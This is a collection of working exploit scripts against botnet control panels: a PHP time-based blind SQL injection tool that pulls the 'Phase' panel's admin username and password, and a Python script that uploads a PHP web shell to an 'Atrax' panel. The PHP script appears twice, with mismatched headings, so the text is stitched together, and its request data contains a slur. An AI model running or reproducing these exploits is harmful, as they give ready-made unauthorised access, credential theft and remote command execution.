- shell: <?php
- // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
- // Start with PHP CLI (php pwn.php)
// Entry point. The time limit is lifted because every oracle request below
// is expected to stall for SLEEP_TIME seconds when its predicate holds.
set_time_limit(0);
// Adjust this :)
// SLEEP_TIME is the delay the injected SLEEP() asks the database for;
// PAGE_TIME is the round-trip time (seconds) at or above which is_true()
// treats the predicate as satisfied. SLEEP_TIME is a string constant, which
// is harmless here because it is only ever concatenated into query text.
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
// Panel base URL; must end in '/' because is_true() appends 'gate.php?...'.
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
// Recover the `settings` rows keyed 'username' and 'password'. Return values
// are dropped: get_string() already prints progress after every byte.
get_string('username');
get_string('password');
/**
 * Find the byte length of the `settings` value whose `key` is $field.
 *
 * Time-based oracle: each iteration asks the database to SLEEP only when
 * LENGTH(value) equals the current guess (the NOT(...) is meant to
 * short-circuit the OR otherwise), so the loop stops at the first guess for
 * which is_true() sees a slow response. The guess starts at 1 and is never
 * bounded, so an empty value, or a server that never stalls, loops forever.
 * $field is spliced into the query text without any escaping.
 *
 * @param string $field  Value of the `key` column to look up.
 * @return int           Length found; also echoed to stdout.
 */
function get_length($field) {
    $length = 1;
    while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
        ++$length;
    }
    echo($field . ' length: ' . $length . PHP_EOL);
    return $length;
}
/**
 * Recover the whole `settings` value whose `key` is $field, byte by byte.
 *
 * Determines the length with get_length(), then calls get_char() for each
 * offset and prints the partial result after every byte, padding the not
 * yet recovered tail with '*'.
 *
 * @param string $field  Value of the `key` column to look up.
 * @return string        Recovered value.
 */
function get_string($field) {
    $length = get_length($field);
    $str = '';
    for ($i = 0; $i < $length; ++$i) {
        $str .= chr(get_char($field, $i));
        echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
    }
    return $str;
}
/**
 * Recover one byte of the `settings` value for $field at 0-based offset $id.
 *
 * Builds the byte's binary string MSB-first by probing bits 1,2,...,64 with
 * one is_true() call each (a slow response means the bit is set). Bit 128
 * is never probed and is written as '0', so only 7-bit ASCII values are
 * recovered correctly; a byte with the high bit set reads back wrong.
 *
 * @param string $field  Value of the `key` column to look up.
 * @param int    $id     0-based byte offset (SUBSTR is 1-based, hence $id + 1).
 * @return int           Byte value in 0..127.
 */
function get_char($field, $id) {
    $binary = '';
    for ($i = 1; $i < 256; $i *= 2) {
        if ($i == 128)
            $binary = '0' . $binary;
        else
            $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
    }
    return bindec($binary);
}
/**
 * Time-based oracle: send one probe and report whether the server stalled.
 *
 * The POST body is a fixed 'u=..&d=..&b=..' field string RC4-encrypted with
 * the 4-byte key 'aaaa', with that same key prepended in the clear. The
 * injection is url-encoded and appended to the `i` GET parameter after a
 * dummy IP. Returns true when the round trip took at least PAGE_TIME
 * seconds, which callers read as "the injected predicate held".
 *
 * Analyst note: if the panel's real clients frame traffic the same way
 * (key in front of the RC4 ciphertext), captured check-ins are decodable
 * without any secret; the probes themselves are recognisable server-side
 * by the UNION SELECT / SLEEP() text in the `i` parameter.
 *
 * @param string $query  Raw injection suffix; not escaped here.
 * @return bool
 */
function is_true($query) {
    $rc4_key = 'aaaa'; // b d u
    $data = 'u=tapz&d=faggot&b=lol';
    $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
    // Key travels in the clear ahead of the ciphertext.
    $encode = $rc4_key . $encode;
    $injection = urlencode($query);
    $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
    return !($req['time'] < PAGE_TIME);
}
/**
 * POST $data to $url and time the round trip.
 *
 * Returns ['page' => response body (false on transfer failure),
 * 'time' => elapsed seconds]. No status-code or TLS checks are made; the
 * only bound on the elapsed time is the 30 s CURLOPT_TIMEOUT.
 *
 * @param string $url
 * @param string $data  Raw request body, sent as-is.
 * @return array{page: string|false, time: float}
 */
function post_request($url, $data) {
    $ch = curl_init($url);
    curl_setopt_array($ch, array(
        CURLOPT_HEADER         => false,
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $data,
        CURLOPT_TIMEOUT        => 30,
    ));
    $started = microtime(true);
    $body = curl_exec($ch);
    $elapsed = microtime(true) - $started;
    curl_close($ch);
    return array(
        'page' => $body,
        'time' => $elapsed
    );
}
/**
 * Textbook RC4 (KSA + PRGA) applied to $data; calling it again decrypts.
 *
 * $pwd is repeated to fill the 256-entry key schedule, the state box is
 * permuted under it, then every input byte is XORed with the next keystream
 * byte. $pwd_length must be > 0 (the key index is taken modulo it).
 *
 * @param string $pwd          Key bytes.
 * @param string $data         Input bytes.
 * @param int    $data_length  Number of bytes of $data to process.
 * @param int    $pwd_length   Number of bytes of $pwd to use.
 * @return string              Output, $data_length bytes long.
 */
function rc4($pwd, $data, $data_length, $pwd_length){
    $schedule = array();
    $state = array();
    for ($n = 0; $n < 256; $n++) {
        $schedule[$n] = ord($pwd[$n % $pwd_length]);
        $state[$n] = $n;
    }
    // Key scheduling: permute the identity box under the repeated key.
    $swap = 0;
    for ($n = 0; $n < 256; $n++) {
        $swap = ($swap + $state[$n] + $schedule[$n]) % 256;
        list($state[$n], $state[$swap]) = array($state[$swap], $state[$n]);
    }
    // Keystream generation: one byte of output per byte of input.
    $out = '';
    $x = 0;
    $y = 0;
    for ($pos = 0; $pos < $data_length; $pos++) {
        $x = ($x + 1) % 256;
        $y = ($y + $state[$x]) % 256;
        list($state[$x], $state[$y]) = array($state[$y], $state[$x]);
        $stream = $state[($state[$x] + $state[$y]) % 256];
        $out .= chr(ord($data[$pos]) ^ $stream);
    }
    return $out;
}
- creds to: Xytilol
- Atrax botnet
- ==============
- Type: Shell Upload
- Shell: #!/usr/bin/python
- import random
- import string
- import base64
- import urllib
- import urllib2
# <CONFIG>
# payload: file body that exploit() asks the panel to write.
# url: panel base; must end in '/' because 'auth.php' and 'plugins/...' are
# appended by plain string concatenation.
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'
# </CONFIG>
# Single-letter parameter names understood by the panel's auth.php; see
# createVictim() and exploit() for how each is populated.
BOT_MODE_INSERT = 'b' # BOT MODE
BOT_MODE_RUNPLUGIN = 'e'
GET_PARAM_MODE = 'a' # GET PARAM
POST_PARAM_GUID = 'h' # POST PARAM
POST_PARAM_IP = 'i'
POST_PARAM_BUILDID = 'j'
POST_PARAM_PC = 'k'
POST_PARAM_OS = 'l'
POST_PARAM_ADMIN = 'm'
POST_PARAM_CPU = 'n'
POST_PARAM_GPU = 'o'
POST_PARAM_PLUGINNAME = 'q'
def request(url, get, post):
    """Send one HTTP request and return the response body (Python 2 urllib2).

    ``get`` is appended verbatim as the query string when non-empty. ``post``
    is a 'k=v&k=v' string; each pair is split on '=' and only the first two
    pieces are kept, so a value containing '=' is cut at that character.
    The resulting dict is url-encoded and sent as the body. When ``post`` is
    '' the untouched empty dict is handed to urllib2.Request instead.
    HTTP error responses are not caught (urllib2 raises on them).
    """
    if not get == '':
        url += '?' + get
    encoded = {}
    if not post == '':
        for _ in post.split('&'):
            data = _.split('=')
            encoded[data[0]] = data[1]
        encoded = urllib.urlencode(encoded)
    # Local name shadows the enclosing function; harmless but easy to misread.
    request = urllib2.Request(url, encoded)
    response = urllib2.urlopen(request)
    page = response.read()
    return page
def queryValue(key, value, next=True):
    """Return ``key=value``, followed by ``&`` unless ``next`` is false.

    Both arguments must already be strings; nothing is escaped here.
    """
    separator = '&' if next else ''
    return key + '=' + value + separator
def randomString(length = 8):
    """Return ``length`` random characters drawn from [a-z0-9].

    Uses ``random.choice``, which is not cryptographically strong.
    """
    alphabet = string.ascii_lowercase + string.digits
    chars = []
    for _ in range(length):
        chars.append(random.choice(alphabet))
    return ''.join(chars)
def createVictim(url, guid, ip):
    """Register (or refresh) a fake bot with the panel via auth.php?a=b.

    The GUID and IP are taken from the caller, the parameter named
    POST_PARAM_ADMIN is set to the literal 'yes', and every other expected
    field is filled with a random token. Returns the raw response body,
    which the caller compares against 'STOP'.
    """
    get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
    post = queryValue(POST_PARAM_GUID, guid)
    post += queryValue(POST_PARAM_IP, ip)
    post += queryValue(POST_PARAM_BUILDID, randomString())
    post += queryValue(POST_PARAM_PC, randomString())
    post += queryValue(POST_PARAM_OS, randomString())
    post += queryValue(POST_PARAM_ADMIN, 'yes')
    post += queryValue(POST_PARAM_CPU, randomString())
    # Last pair carries no trailing '&'.
    post += queryValue(POST_PARAM_GPU, randomString(), False)
    return request(url + 'auth.php', get, post)
def exploit(url, guid, ip, file, payload):
    """Ask the panel to run the 'atraxstealer' plugin handler (auth.php?a=e).

    Besides the bot identity, the raw fields 'am', 'ad', 'ab' and 'ai' are
    sent: 'ad' carries ``file`` and 'ab' the base64 of ``payload``;
    testExploit() evidently expects the result to appear under
    plugins/atraxstealer/wallet/<file>. The response body is discarded,
    so no success signal is available from this call alone.
    """
    get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
    post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
    post += queryValue(POST_PARAM_GUID, guid)
    post += queryValue(POST_PARAM_IP, ip)
    post += queryValue('am', randomString())
    post += queryValue('ad', file)
    post += queryValue('ab', base64.b64encode(payload))
    post += queryValue('ai', '18', False)
    request(url + 'auth.php', get, post)
def testExploit(url, guid, ip):
    """Dry run: check that a file written via exploit() is served back.

    Uploads a throwaway PHP file that only echoes '1337', fetches it from
    plugins/atraxstealer/wallet/ and returns True when the stripped body
    matches. The probe file is never removed afterwards.
    """
    file = randomString() + '.php'
    payload = '<?php echo("1337"); ?>'
    exploit(url, guid, ip, file, payload)
    return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
# Hard-coded bot identity reused for every request.
guid = '7461707a7461707a7461707a7461707a'
ip = '91.224.13.103'
# Name under which the final payload is stored (shadows the py2 builtin `file`).
file = randomString() + '.php'
# Step 1: the panel must accept the fake bot; it answers 'STOP' on refusal.
if createVictim(url, guid, ip).strip() == 'STOP':
    print '[-] Cannot create victim...'
else:
    print '[~] Victim created/updated...'
    # Step 2: harmless marker file first, then the configured payload.
    if testExploit(url, guid, ip):
        exploit(url, guid, ip, file, payload)
        print '[+] Exploit uploaded!'
        print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
    else:
        print '[-] Cannot upload payload, maybe the plugin is not actived?'
- Phase botnet
- ===============
- Type: blind SQLi
- Vuln: <?php
- // Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
- // Start with PHP CLI (php pwn.php)
// Entry point. The time limit is lifted because every oracle request below
// is expected to stall for SLEEP_TIME seconds when its predicate holds.
set_time_limit(0);
// Adjust this :)
// SLEEP_TIME is the delay the injected SLEEP() asks the database for;
// PAGE_TIME is the round-trip time (seconds) at or above which is_true()
// treats the predicate as satisfied. SLEEP_TIME is a string constant, which
// is harmless here because it is only ever concatenated into query text.
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
// Panel base URL; must end in '/' because is_true() appends 'gate.php?...'.
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
// Recover the `settings` rows keyed 'username' and 'password'. Return values
// are dropped: get_string() already prints progress after every byte.
get_string('username');
get_string('password');
/**
 * Find the byte length of the `settings` value whose `key` is $field.
 *
 * Time-based oracle: each iteration asks the database to SLEEP only when
 * LENGTH(value) equals the current guess (the NOT(...) is meant to
 * short-circuit the OR otherwise), so the loop stops at the first guess for
 * which is_true() sees a slow response. The guess starts at 1 and is never
 * bounded, so an empty value, or a server that never stalls, loops forever.
 * $field is spliced into the query text without any escaping.
 *
 * @param string $field  Value of the `key` column to look up.
 * @return int           Length found; also echoed to stdout.
 */
function get_length($field) {
    $length = 1;
    while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
        ++$length;
    }
    echo($field . ' length: ' . $length . PHP_EOL);
    return $length;
}
/**
 * Recover the whole `settings` value whose `key` is $field, byte by byte.
 *
 * Determines the length with get_length(), then calls get_char() for each
 * offset and prints the partial result after every byte, padding the not
 * yet recovered tail with '*'.
 *
 * @param string $field  Value of the `key` column to look up.
 * @return string        Recovered value.
 */
function get_string($field) {
    $length = get_length($field);
    $str = '';
    for ($i = 0; $i < $length; ++$i) {
        $str .= chr(get_char($field, $i));
        echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
    }
    return $str;
}
/**
 * Recover one byte of the `settings` value for $field at 0-based offset $id.
 *
 * Builds the byte's binary string MSB-first by probing bits 1,2,...,64 with
 * one is_true() call each (a slow response means the bit is set). Bit 128
 * is never probed and is written as '0', so only 7-bit ASCII values are
 * recovered correctly; a byte with the high bit set reads back wrong.
 *
 * @param string $field  Value of the `key` column to look up.
 * @param int    $id     0-based byte offset (SUBSTR is 1-based, hence $id + 1).
 * @return int           Byte value in 0..127.
 */
function get_char($field, $id) {
    $binary = '';
    for ($i = 1; $i < 256; $i *= 2) {
        if ($i == 128)
            $binary = '0' . $binary;
        else
            $binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
    }
    return bindec($binary);
}
/**
 * Time-based oracle: send one probe and report whether the server stalled.
 *
 * The POST body is a fixed 'u=..&d=..&b=..' field string RC4-encrypted with
 * the 4-byte key 'aaaa', with that same key prepended in the clear. The
 * injection is url-encoded and appended to the `i` GET parameter after a
 * dummy IP. Returns true when the round trip took at least PAGE_TIME
 * seconds, which callers read as "the injected predicate held".
 *
 * Analyst note: if the panel's real clients frame traffic the same way
 * (key in front of the RC4 ciphertext), captured check-ins are decodable
 * without any secret; the probes themselves are recognisable server-side
 * by the UNION SELECT / SLEEP() text in the `i` parameter.
 *
 * @param string $query  Raw injection suffix; not escaped here.
 * @return bool
 */
function is_true($query) {
    $rc4_key = 'aaaa'; // b d u
    $data = 'u=tapz&d=faggot&b=lol';
    $encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
    // Key travels in the clear ahead of the ciphertext.
    $encode = $rc4_key . $encode;
    $injection = urlencode($query);
    $req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
    return !($req['time'] < PAGE_TIME);
}
/**
 * POST $data to $url and time the round trip.
 *
 * Returns ['page' => response body (false on transfer failure),
 * 'time' => elapsed seconds]. No status-code or TLS checks are made; the
 * only bound on the elapsed time is the 30 s CURLOPT_TIMEOUT.
 *
 * @param string $url
 * @param string $data  Raw request body, sent as-is.
 * @return array{page: string|false, time: float}
 */
function post_request($url, $data) {
    $ch = curl_init($url);
    curl_setopt_array($ch, array(
        CURLOPT_HEADER         => false,
        CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => $data,
        CURLOPT_TIMEOUT        => 30,
    ));
    $started = microtime(true);
    $body = curl_exec($ch);
    $elapsed = microtime(true) - $started;
    curl_close($ch);
    return array(
        'page' => $body,
        'time' => $elapsed
    );
}
/**
 * Textbook RC4 (KSA + PRGA) applied to $data; calling it again decrypts.
 *
 * $pwd is repeated to fill the 256-entry key schedule, the state box is
 * permuted under it, then every input byte is XORed with the next keystream
 * byte. $pwd_length must be > 0 (the key index is taken modulo it).
 *
 * @param string $pwd          Key bytes.
 * @param string $data         Input bytes.
 * @param int    $data_length  Number of bytes of $data to process.
 * @param int    $pwd_length   Number of bytes of $pwd to use.
 * @return string              Output, $data_length bytes long.
 */
function rc4($pwd, $data, $data_length, $pwd_length){
    $schedule = array();
    $state = array();
    for ($n = 0; $n < 256; $n++) {
        $schedule[$n] = ord($pwd[$n % $pwd_length]);
        $state[$n] = $n;
    }
    // Key scheduling: permute the identity box under the repeated key.
    $swap = 0;
    for ($n = 0; $n < 256; $n++) {
        $swap = ($swap + $state[$n] + $schedule[$n]) % 256;
        list($state[$n], $state[$swap]) = array($state[$swap], $state[$n]);
    }
    // Keystream generation: one byte of output per byte of input.
    $out = '';
    $x = 0;
    $y = 0;
    for ($pos = 0; $pos < $data_length; $pos++) {
        $x = ($x + 1) % 256;
        $y = ($y + $state[$x]) % 256;
        list($state[$x], $state[$y]) = array($state[$y], $state[$x]);
        $stream = $state[($state[$x] + $state[$y]) % 256];
        $out .= chr(ord($data[$pos]) ^ $stream);
    }
    return $out;
}